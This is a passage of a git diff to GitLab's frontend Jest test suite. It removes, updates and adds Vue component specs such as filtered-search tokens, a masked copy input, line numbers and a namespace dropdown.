'<div></div>', - methods: { - getValue: () => '=', - }, - }, -}; - -describe('EpicToken', () => { - let mock; - let wrapper; - let fakeApollo; - - const findBaseToken = () => wrapper.findComponent(BaseToken); - - function createComponent( - options = {}, - epicsQueryHandler = jest.fn().mockResolvedValue(mockGroupEpicsQueryResponse), - ) { - fakeApollo = createMockApollo([[searchEpicsQuery, epicsQueryHandler]]); - const { - config = mockEpicToken, - value = { data: '' }, - active = false, - stubs = defaultStubs, - } = options; - return mount(EpicToken, { - apolloProvider: fakeApollo, - propsData: { - config, - value, - active, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: 'custom-class', - }, - stubs, - }); - } - - beforeEach(() => { - mock = new MockAdapter(axios); - wrapper = createComponent(); - }); - - afterEach(() => { - mock.restore(); - wrapper.destroy(); - }); - - describe('computed', () => { - beforeEach(async () => { - wrapper = createComponent({ - data: { - epics: mockEpics, - }, - }); - - await wrapper.vm.$nextTick(); - }); - }); - - describe('methods', () => { - describe('fetchEpicsBySearchTerm', () => { - it('calls fetchEpics with provided searchTerm param', () => { - jest.spyOn(wrapper.vm, 'fetchEpics'); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - expect(wrapper.vm.fetchEpics).toHaveBeenCalledWith('foo'); - }); - - it('sets response to `epics` when request is successful', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockResolvedValue({ - data: mockEpics, - }); - - findBaseToken().vm.$emit('fetch-suggestions'); - - await waitForPromises(); - - expect(wrapper.vm.epics).toEqual(mockEpics); - }); - - it('calls `createFlash` with flash error message when request fails', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockRejectedValue({}); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - await waitForPromises(); - - expect(createFlash).toHaveBeenCalledWith({ - message: 'There was a problem fetching epics.', - }); - }); - - it('sets `loading` to false when request completes', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockRejectedValue({}); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - await waitForPromises(); - - expect(wrapper.vm.loading).toBe(false); - }); - }); - }); - - describe('template', () => { - const getTokenValueEl = () => wrapper.findAllComponents(GlFilteredSearchTokenSegment).at(2); - - beforeEach(async () => { - wrapper = createComponent({ - value: { data: `${mockEpics[0].title}::&${mockEpics[0].iid}` }, - data: { epics: mockEpics }, - }); - - await wrapper.vm.$nextTick(); - }); - - it('renders BaseToken component', () => { - expect(findBaseToken().exists()).toBe(true); - }); - - it('renders token item when value is selected', () => { - const tokenSegments = wrapper.findAll(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); - expect(tokenSegments.at(2).text()).toBe(`${mockEpics[0].title}::&${mockEpics[0].iid}`); - }); - - it.each` - value | valueType | tokenValueString - ${`${mockEpics[0].title}::&${mockEpics[0].iid}`} | ${'string'} | ${`${mockEpics[0].title}::&${mockEpics[0].iid}`} - ${`${mockEpics[1].title}::&${mockEpics[1].iid}`} | ${'number'} | ${`${mockEpics[1].title}::&${mockEpics[1].iid}`} - `('renders token item when selection is a $valueType', async ({ value, tokenValueString }) => { - wrapper.setProps({ - value: { data: value }, - }); - - await wrapper.vm.$nextTick(); - - expect(getTokenValueEl().text()).toBe(tokenValueString); - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js deleted file mode 100644 index 44bc16adb97..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js +++ /dev/null @@ -1,116 +0,0 @@ -import { - GlFilteredSearchToken, - GlFilteredSearchTokenSegment, - GlFilteredSearchSuggestion, -} from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; -import IterationToken from '~/vue_shared/components/filtered_search_bar/tokens/iteration_token.vue'; -import { mockIterationToken, mockIterations } from '../mock_data'; - -jest.mock('~/flash'); - -describe('IterationToken', () => { - const id = 123; - let wrapper; - - const createComponent = ({ - config = mockIterationToken, - value = { data: '' }, - active = false, - stubs = {}, - provide = {}, - } = {}) => - mount(IterationToken, { - propsData: { - active, - config, - value, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: () => 'custom-class', - ...provide, - }, - stubs, - }); - - afterEach(() => { - wrapper.destroy(); - }); - - describe('when iteration cadence feature is available', () => { - beforeEach(async () => { - wrapper = createComponent({ - active: true, - config: { ...mockIterationToken, initialIterations: mockIterations }, - value: { data: 'i' }, - stubs: { Portal: true }, - provide: { - glFeatures: { - iterationCadences: true, - }, - }, - }); - - await wrapper.setData({ loading: false }); - }); - - it('renders iteration start date and due date', () => { - const suggestions = wrapper.findAll(GlFilteredSearchSuggestion); - - expect(suggestions.at(3).text()).toContain('Nov 5, 2021 - Nov 10, 2021'); - }); - }); - - it('renders iteration value', async () => { - wrapper = createComponent({ value: { data: id } }); - - await wrapper.vm.$nextTick(); - - const tokenSegments = wrapper.findAllComponents(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); // `Iteration` `=` `gitlab-org: #1` - expect(tokenSegments.at(2).text()).toBe(id.toString()); - }); - - it('fetches initial values', () => { - const fetchIterationsSpy = jest.fn().mockResolvedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - value: { data: id }, - }); - - expect(fetchIterationsSpy).toHaveBeenCalledWith(id); - }); - - it('fetches iterations on user input', () => { - const search = 'hello'; - const fetchIterationsSpy = jest.fn().mockResolvedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - }); - - wrapper.findComponent(GlFilteredSearchToken).vm.$emit('input', { data: search }); - - expect(fetchIterationsSpy).toHaveBeenCalledWith(search); - }); - - it('renders error message when request fails', async () => { - const fetchIterationsSpy = jest.fn().mockRejectedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - }); - - await waitForPromises(); - - expect(createFlash).toHaveBeenCalledWith({ - message: 'There was a problem fetching iterations.', - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js index 936841651d1..4a098db33c5 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js @@ -9,18 +9,15 @@ import MockAdapter from 'axios-mock-adapter'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import { sortMilestonesByDueDate } from '~/milestones/milestone_utils'; +import { sortMilestonesByDueDate } from '~/milestones/utils'; -import { - DEFAULT_MILESTONES, - DEFAULT_MILESTONES_GRAPHQL, -} from '~/vue_shared/components/filtered_search_bar/constants'; +import { DEFAULT_MILESTONES } from '~/vue_shared/components/filtered_search_bar/constants'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; import { mockMilestoneToken, mockMilestones, mockRegularMilestone } from '../mock_data'; jest.mock('~/flash'); -jest.mock('~/milestones/milestone_utils'); +jest.mock('~/milestones/utils'); const defaultStubs = { Portal: true, @@ -199,12 +196,12 @@ describe('MilestoneToken', () => { beforeEach(() => { wrapper = createComponent({ active: true, - config: { ...mockMilestoneToken, defaultMilestones: DEFAULT_MILESTONES_GRAPHQL }, + config: { ...mockMilestoneToken, defaultMilestones: DEFAULT_MILESTONES }, }); }); it('finds the correct value from the activeToken', () => { - DEFAULT_MILESTONES_GRAPHQL.forEach(({ value, title }) => { + DEFAULT_MILESTONES.forEach(({ value, title }) => { const activeToken = wrapper.vm.getActiveMilestone([], value); expect(activeToken.title).toEqual(title); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js index b804ff97b82..b2f246a5985 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js @@ -8,7 +8,7 @@ import { mockReleaseToken } from '../mock_data'; jest.mock('~/flash'); describe('ReleaseToken', () => { - const id = 123; + const id = '123'; let wrapper; const createComponent = ({ config = mockReleaseToken, value = { data: '' } } = {}) => diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js deleted file mode 100644 index 4277899f8db..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js +++ /dev/null @@ -1,38 +0,0 @@ -import { GlFilteredSearchTokenSegment } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; -import { mockWeightToken } from '../mock_data'; - -jest.mock('~/flash'); - -describe('WeightToken', () => { - const weight = '3'; - let wrapper; - - const createComponent = ({ config = mockWeightToken, value = { data: '' } } = {}) => - mount(WeightToken, { - propsData: { - active: false, - config, - value, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: () => 'custom-class', - }, - }); - - afterEach(() => { - wrapper.destroy(); - }); - - it('renders weight value', () => { - wrapper = createComponent({ value: { data: weight } }); - - const tokenSegments = wrapper.findAllComponents(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); // `Weight` `=` `3` - expect(tokenSegments.at(2).text()).toBe(weight); - }); -}); diff --git a/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap b/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap index ff1dad2de68..58ad1f681bc 100644 --- a/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap +++ b/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap @@ -5,6 +5,7 @@ exports[`Title edit field matches the snapshot 1`] = ` label="Title" label-for="title-field-edit" labeldescription="" + optionaltext="(optional)" > <gl-form-input-stub /> </gl-form-group-stub> diff --git a/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js b/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js new file mode 100644 index 00000000000..b67385cc43e --- /dev/null +++ b/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js @@ -0,0 +1,231 @@ +import { merge } from 'lodash'; +import { GlFormInputGroup } from '@gitlab/ui'; + +import InputCopyToggleVisibility from '~/vue_shared/components/form/input_copy_toggle_visibility.vue'; +import ClipboardButton from '~/vue_shared/components/clipboard_button.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; + +import { mountExtended } from 'helpers/vue_test_utils_helper'; + +describe('InputCopyToggleVisibility', () => { + let wrapper; + + afterEach(() => { + wrapper.destroy(); + }); + + const valueProp = 'hR8x1fuJbzwu5uFKLf9e'; + + const createComponent = (options = {}) => { + wrapper = mountExtended( + InputCopyToggleVisibility, + merge({}, options, { + directives: { + GlTooltip: createMockDirective(), + }, + }), + ); + }; + + const findFormInputGroup = () => wrapper.findComponent(GlFormInputGroup); + const findFormInput = () => findFormInputGroup().find('input'); + const findRevealButton = () => + wrapper.findByRole('button', { + name: InputCopyToggleVisibility.i18n.toggleVisibilityLabelReveal, + }); + const findHideButton = () => + wrapper.findByRole('button', { + name: InputCopyToggleVisibility.i18n.toggleVisibilityLabelHide, + }); + const findCopyButton = () => wrapper.findComponent(ClipboardButton); + const createCopyEvent = () => { + const event = new Event('copy', { cancelable: true }); + Object.assign(event, { preventDefault: jest.fn(), clipboardData: { setData: jest.fn() } }); + + return event; + }; + + const itDoesNotModifyCopyEvent = () => { + it('does not modify copy event', () => { + const event = createCopyEvent(); + + findFormInput().element.dispatchEvent(event); + + expect(event.clipboardData.setData).not.toHaveBeenCalled(); + expect(event.preventDefault).not.toHaveBeenCalled(); + }); + }; + + describe('when `value` prop is passed', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + }, + }); + }); + + it('displays value as hidden', () => { + expect(findFormInputGroup().props('value')).toBe('********************'); + }); + + it('saves actual value to clipboard when manually copied', () => { + const event = createCopyEvent(); + findFormInput().element.dispatchEvent(event); + + expect(event.clipboardData.setData).toHaveBeenCalledWith('text/plain', valueProp); + expect(event.preventDefault).toHaveBeenCalled(); + }); + + describe('visibility toggle button', () => { + it('renders a reveal button', () => { + const revealButton = findRevealButton(); + + expect(revealButton.exists()).toBe(true); + + const tooltip = getBinding(revealButton.element, 'gl-tooltip'); + + expect(tooltip.value).toBe(InputCopyToggleVisibility.i18n.toggleVisibilityLabelReveal); + }); + + describe('when clicked', () => { + beforeEach(async () => { + await findRevealButton().trigger('click'); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + it('renders a hide button', () => { + const hideButton = findHideButton(); + + expect(hideButton.exists()).toBe(true); + + const tooltip = getBinding(hideButton.element, 'gl-tooltip'); + + expect(tooltip.value).toBe(InputCopyToggleVisibility.i18n.toggleVisibilityLabelHide); + }); + + it('emits `visibility-change` event', () => { + expect(wrapper.emitted('visibility-change')[0]).toEqual([true]); + }); + }); + }); + + describe('copy button', () => { + it('renders button with correct props passed', () => { + expect(findCopyButton().props()).toMatchObject({ + text: valueProp, + title: 'Copy', + }); + }); + + describe('when clicked', () => { + beforeEach(async () => { + await findCopyButton().trigger('click'); + }); + + it('emits `copy` event', () => { + expect(wrapper.emitted('copy')[0]).toEqual([]); + }); + }); + }); + }); + + describe('when `value` prop is not passed', () => { + beforeEach(() => { + createComponent(); + }); + + it('displays value as hidden with 20 asterisks', () => { + expect(findFormInputGroup().props('value')).toBe('********************'); + }); + }); + + describe('when `initialVisibility` prop is `true`', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + initialVisibility: true, + }, + }); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + itDoesNotModifyCopyEvent(); + }); + + describe('when `showToggleVisibilityButton` is `false`', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + showToggleVisibilityButton: false, + }, + }); + }); + + it('does not render visibility toggle button', () => { + expect(findRevealButton().exists()).toBe(false); + expect(findHideButton().exists()).toBe(false); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + itDoesNotModifyCopyEvent(); + }); + + describe('when `showCopyButton` is `false`', () => { + beforeEach(() => { + createComponent({ + propsData: { + showCopyButton: false, + }, + }); + }); + + it('does not render copy button', () => { + expect(findCopyButton().exists()).toBe(false); + }); + }); + + it('passes `formInputGroupProps` prop to `GlFormInputGroup`', () => { + createComponent({ + propsData: { + formInputGroupProps: { + label: 'Foo bar', + }, + }, + }); + + expect(findFormInputGroup().props('label')).toBe('Foo bar'); + }); + + it('passes `copyButtonTitle` prop to `ClipboardButton`', () => { + createComponent({ + propsData: { + copyButtonTitle: 'Copy token', + }, + }); + + expect(findCopyButton().props('title')).toBe('Copy token'); + }); + + it('renders slots in `gl-form-group`', () => { + const description = 'Mock input description'; + createComponent({ + slots: { + description, + }, + }); + + expect(wrapper.findByText(description).exists()).toBe(true); + }); +}); diff --git a/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js b/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js index 390a70792f3..b837a998cd6 100644 --- a/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js +++ b/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js @@ -1,12 +1,12 @@ import { GlModal } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { BV_SHOW_MODAL, BV_HIDE_MODAL } from '~/lib/utils/constants'; import GlModalVuex from '~/vue_shared/components/gl_modal_vuex.vue'; import createState from '~/vuex_shared/modules/modal/state'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const TEST_SLOT = 'Lorem ipsum modal dolar sit.'; const TEST_MODAL_ID = 'my-modal-id'; @@ -36,7 +36,6 @@ describe('GlModalVuex', () => { wrapper = shallowMount(GlModalVuex, { ...options, - localVue, store, propsData, stubs: { diff --git a/spec/frontend/vue_shared/components/header_ci_component_spec.js b/spec/frontend/vue_shared/components/header_ci_component_spec.js index b76f475a6fb..aea76f164f0 100644 --- a/spec/frontend/vue_shared/components/header_ci_component_spec.js +++ b/spec/frontend/vue_shared/components/header_ci_component_spec.js @@ -1,4 +1,4 @@ -import { GlButton, GlAvatarLink } from '@gitlab/ui'; +import { GlButton, GlAvatarLink, GlTooltip } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import CiIconBadge from '~/vue_shared/components/ci_badge_link.vue'; @@ -32,6 +32,7 @@ describe('Header CI Component', () => { const findTimeAgo = () => wrapper.findComponent(TimeagoTooltip); const findUserLink = () => wrapper.findComponent(GlAvatarLink); const findSidebarToggleBtn = () => wrapper.findComponent(GlButton); + const findStatusTooltip = () => wrapper.findComponent(GlTooltip); const findActionButtons = () => wrapper.findByTestId('ci-header-action-buttons'); const findHeaderItemText = () => wrapper.findByTestId('ci-header-item-text'); @@ -91,6 +92,21 @@ describe('Header CI Component', () => { }); }); + describe('when the user has a status', () => { + const STATUS_MESSAGE = 'Working on exciting features...'; + + beforeEach(() => { + createComponent({ + itemName: 'Pipeline', + user: { ...defaultProps.user, status: { message: STATUS_MESSAGE } }, + }); + }); + + it('renders a tooltip', () => { + expect(findStatusTooltip().text()).toBe(STATUS_MESSAGE); + }); + }); + describe('with data from GraphQL', () => { const userId = 1; diff --git a/spec/frontend/vue_shared/components/line_numbers_spec.js b/spec/frontend/vue_shared/components/line_numbers_spec.js new file mode 100644 index 00000000000..5bedd0ccd02 --- /dev/null +++ b/spec/frontend/vue_shared/components/line_numbers_spec.js @@ -0,0 +1,71 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlIcon, GlLink } from '@gitlab/ui'; +import LineNumbers from '~/vue_shared/components/line_numbers.vue'; + +describe('Line Numbers component', () => { + let wrapper; + const lines = 10; + + const createComponent = () => { + wrapper = shallowMount(LineNumbers, { propsData: { lines } }); + }; + + const findGlIcon = () => wrapper.findComponent(GlIcon); + const findLineNumbers = () => wrapper.findAllComponents(GlLink); + const findFirstLineNumber = () => findLineNumbers().at(0); + const findSecondLineNumber = () => findLineNumbers().at(1); + + beforeEach(() => createComponent()); + + afterEach(() => wrapper.destroy()); + + describe('rendering', () => { + it('renders Line Numbers', () => { + expect(findLineNumbers().length).toBe(lines); + expect(findFirstLineNumber().attributes()).toMatchObject({ + id: 'L1', + href: '#L1', + }); + }); + + it('renders a link icon', () => { + expect(findGlIcon().props()).toMatchObject({ + size: 12, + name: 'link', + }); + }); + }); + + describe('clicking a line number', () => { + let firstLineNumber; + let firstLineNumberElement; + + beforeEach(() => { + firstLineNumber = findFirstLineNumber(); + firstLineNumberElement = firstLineNumber.element; + + jest.spyOn(firstLineNumberElement, 'scrollIntoView'); + jest.spyOn(firstLineNumberElement.classList, 'add'); + jest.spyOn(firstLineNumberElement.classList, 'remove'); + + firstLineNumber.vm.$emit('click'); + }); + + it('adds the highlight (hll) class', () => { + expect(firstLineNumberElement.classList.add).toHaveBeenCalledWith('hll'); + }); + + it('removes the highlight (hll) class from a previously highlighted line', () => { + findSecondLineNumber().vm.$emit('click'); + + expect(firstLineNumberElement.classList.remove).toHaveBeenCalledWith('hll'); + }); + + it('scrolls the line into view', () => { + expect(firstLineNumberElement.scrollIntoView).toHaveBeenCalledWith({ + behavior: 'smooth', + block: 'center', + }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/markdown/toolbar_spec.js b/spec/frontend/vue_shared/components/markdown/toolbar_spec.js index eddc4033a65..8bff85b0bda 100644 --- a/spec/frontend/vue_shared/components/markdown/toolbar_spec.js +++ b/spec/frontend/vue_shared/components/markdown/toolbar_spec.js @@ -1,24 +1,17 @@ import { mount } from '@vue/test-utils'; -import { isExperimentVariant } from '~/experimentation/utils'; -import InviteMembersTrigger from '~/invite_members/components/invite_members_trigger.vue'; -import { INVITE_MEMBERS_IN_COMMENT } from '~/invite_members/constants'; import Toolbar from '~/vue_shared/components/markdown/toolbar.vue'; -jest.mock('~/experimentation/utils', () => ({ isExperimentVariant: jest.fn() })); - describe('toolbar', () => { let wrapper; const createMountedWrapper = (props = {}) => { wrapper = mount(Toolbar, { propsData: { markdownDocsPath: '', ...props }, - stubs: { 'invite-members-trigger': true }, }); }; afterEach(() => { wrapper.destroy(); - isExperimentVariant.mockReset(); }); describe('user can attach file', () => { @@ -40,36 +33,4 @@ describe('toolbar', () => { expect(wrapper.vm.$el.querySelector('.uploading-container')).toBeNull(); }); }); - - describe('user can invite member', () => { - const findInviteLink = () => wrapper.find(InviteMembersTrigger); - - beforeEach(() => { - isExperimentVariant.mockReturnValue(true); - createMountedWrapper(); - }); - - it('should render the invite members trigger', () => { - expect(findInviteLink().exists()).toBe(true); - }); - - it('should have correct props', () => { - expect(findInviteLink().props().displayText).toBe('Invite Member'); - expect(findInviteLink().props().trackExperiment).toBe(INVITE_MEMBERS_IN_COMMENT); - expect(findInviteLink().props().triggerSource).toBe(INVITE_MEMBERS_IN_COMMENT); - }); - }); - - describe('user can not invite member', () => { - const findInviteLink = () => wrapper.find(InviteMembersTrigger); - - beforeEach(() => { - isExperimentVariant.mockReturnValue(false); - createMountedWrapper(); - }); - - it('should render the invite members trigger', () => { - expect(findInviteLink().exists()).toBe(false); - }); - }); }); diff --git a/spec/frontend/vue_shared/components/namespace_select/mock_data.js b/spec/frontend/vue_shared/components/namespace_select/mock_data.js new file mode 100644 index 00000000000..c9d96672e85 --- /dev/null +++ b/spec/frontend/vue_shared/components/namespace_select/mock_data.js @@ -0,0 +1,11 @@ +export const group = [ + { id: 1, name: 'Group 1', humanName: 'Group 1' }, + { id: 2, name: 'Subgroup 1', humanName: 'Group 1 / Subgroup 1' }, +]; + +export const user = [{ id: 3, name: 'User namespace 1', humanName: 'User namespace 1' }]; + +export const namespaces = { + group, + user, +}; diff --git a/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js b/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js new file mode 100644 index 00000000000..8f07f63993d --- /dev/null +++ b/spec/frontend/vue_shared/components/namespace_select/namespace_select_spec.js @@ -0,0 +1,86 @@ +import { GlDropdown, GlDropdownItem, GlDropdownSectionHeader } from '@gitlab/ui'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import NamespaceSelect, { + i18n, +} from '~/vue_shared/components/namespace_select/namespace_select.vue'; +import { user, group, namespaces } from './mock_data'; + +describe('Namespace Select', () => { + let wrapper; + + const createComponent = (props = {}) => + shallowMountExtended(NamespaceSelect, { + propsData: { + data: namespaces, + ...props, + }, + }); + + const wrappersText = (arr) => arr.wrappers.map((w) => w.text()); + const flatNamespaces = () => [...group, ...user]; + const findDropdown = () => wrapper.findComponent(GlDropdown); + const findDropdownAttributes = (attr) => findDropdown().attributes(attr); + const selectedDropdownItemText = () => findDropdownAttributes('text'); + const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findSectionHeaders = () => wrapper.findAllComponents(GlDropdownSectionHeader); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders the dropdown', () => { + expect(findDropdown().exists()).toBe(true); + }); + + it('renders each dropdown item', () => { + const items = findDropdownItems().wrappers; + expect(items).toHaveLength(flatNamespaces().length); + }); + + it('renders the human name for each item', () => { + const dropdownItems = wrappersText(findDropdownItems()); + const flatNames = flatNamespaces().map(({ humanName }) => humanName); + expect(dropdownItems).toEqual(flatNames); + }); + + it('sets the initial dropdown text', () => { + expect(selectedDropdownItemText()).toBe(i18n.DEFAULT_TEXT); + }); + + it('splits group and user namespaces', () => { + const headers = findSectionHeaders(); + expect(headers).toHaveLength(2); + expect(wrappersText(headers)).toEqual([i18n.GROUPS, i18n.USERS]); + }); + + it('sets the dropdown to full width', () => { + expect(findDropdownAttributes('block')).toBeUndefined(); + + wrapper = createComponent({ fullWidth: true }); + + expect(findDropdownAttributes('block')).not.toBeUndefined(); + expect(findDropdownAttributes('block')).toBe('true'); + }); + + describe('with a selected namespace', () => { + const selectedGroupIndex = 1; + const selectedItem = group[selectedGroupIndex]; + + beforeEach(() => { + findDropdownItems().at(selectedGroupIndex).vm.$emit('click'); + }); + + it('sets the dropdown text', () => { + expect(selectedDropdownItemText()).toBe(selectedItem.humanName); + }); + + it('emits the `select` event when a namespace is selected', () => { + const args = [selectedItem]; + expect(wrapper.emitted('select')).toEqual([args]); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js b/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js index 0f30b50da0b..c8dab0204d3 100644 --- a/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js +++ b/spec/frontend/vue_shared/components/notes/placeholder_note_spec.js @@ -1,10 +1,11 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import IssuePlaceholderNote from '~/vue_shared/components/notes/placeholder_note.vue'; +import UserAvatarLink from '~/vue_shared/components/user_avatar/user_avatar_link.vue'; import { userDataMock } from '../../../notes/mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const getters = { getUserData: () => userDataMock, @@ -15,9 +16,8 @@ describe('Issue placeholder note component', () => { const findNote = () => wrapper.find({ ref: 'note' }); - const createComponent = (isIndividual = false) => { + const createComponent = (isIndividual = false, propsData = {}) => { wrapper = shallowMount(IssuePlaceholderNote, { - localVue, store: new Vuex.Store({ getters, }), @@ -26,6 +26,7 @@ describe('Issue placeholder note component', () => { body: 'Foo', individual_note: isIndividual, }, + ...propsData, }, }); }; @@ -52,4 +53,17 @@ describe('Issue placeholder note component', () => { expect(findNote().classes()).toContain('discussion'); }); + + describe('avatar size', () => { + it.each` + size | line | isOverviewTab + ${40} | ${null} | ${false} + ${24} | ${{ line_code: '123' }} | ${false} + ${40} | ${{ line_code: '123' }} | ${true} + `('renders avatar $size for $line and $isOverviewTab', ({ size, line, isOverviewTab }) => { + createComponent(false, { line, isOverviewTab }); + + expect(wrapper.findComponent(UserAvatarLink).props('imgSize')).toBe(size); + }); + }); }); diff --git a/spec/frontend/import_entities/components/pagination_bar_spec.js b/spec/frontend/vue_shared/components/pagination_bar/pagination_bar_spec.js index 163ce11a8db..08119dee8af 100644 --- a/spec/frontend/import_entities/components/pagination_bar_spec.js +++ b/spec/frontend/vue_shared/components/pagination_bar/pagination_bar_spec.js @@ -1,16 +1,16 @@ import { GlPagination, GlDropdown, GlDropdownItem } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; -import PaginationBar from '~/import_entities/components/pagination_bar.vue'; +import PaginationBar from '~/vue_shared/components/pagination_bar/pagination_bar.vue'; import PaginationLinks from '~/vue_shared/components/pagination_links.vue'; describe('Pagination bar', () => { const DEFAULT_PROPS = { pageInfo: { total: 50, - page: 1, + totalPages: 3, + page: 3, perPage: 20, }, - itemsCount: 17, }; let wrapper; @@ -73,7 +73,7 @@ describe('Pagination bar', () => { createComponent(); expect(wrapper.find('[data-testid="information"]').text()).toMatchInterpolatedText( - 'Showing 1 - 17 of 50', + 'Showing 41 - 50 of 50', ); }); @@ -82,11 +82,12 @@ describe('Pagination bar', () => { pageInfo: { ...DEFAULT_PROPS.pageInfo, total: 1200, + page: 2, }, }); expect(wrapper.find('[data-testid="information"]').text()).toMatchInterpolatedText( - 'Showing 1 - 17 of 1000+', + 'Showing 21 - 40 of 1000+', ); }); }); diff --git a/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js b/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js index 7fdacbe83a2..5afa017aa76 100644 --- a/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js +++ b/spec/frontend/vue_shared/components/project_selector/project_list_item_spec.js @@ -1,13 +1,12 @@ -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import mockProjects from 'test_fixtures_static/projects.json'; import { trimText } from 'helpers/text_helper'; import ProjectAvatar from '~/vue_shared/components/deprecated_project_avatar/default.vue'; import ProjectListItem from '~/vue_shared/components/project_selector/project_list_item.vue'; -const localVue = createLocalVue(); - describe('ProjectListItem component', () => { - const Component = localVue.extend(ProjectListItem); + const Component = Vue.extend(ProjectListItem); let wrapper; let vm; let options; @@ -20,7 +19,6 @@ describe('ProjectListItem component', () => { project, selected: false, }, - localVue, }; }); diff --git a/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js b/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js index de5cee846a1..34cee10392d 100644 --- a/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js +++ b/spec/frontend/vue_shared/components/project_selector/project_selector_spec.js @@ -1,5 +1,5 @@ import { GlSearchBoxByType, GlInfiniteScroll } from '@gitlab/ui'; -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; import { head } from 'lodash'; import Vue from 'vue'; import mockProjects from 'test_fixtures_static/projects.json'; @@ -7,8 +7,6 @@ import { trimText } from 'helpers/text_helper'; import ProjectListItem from '~/vue_shared/components/project_selector/project_list_item.vue'; import ProjectSelector from 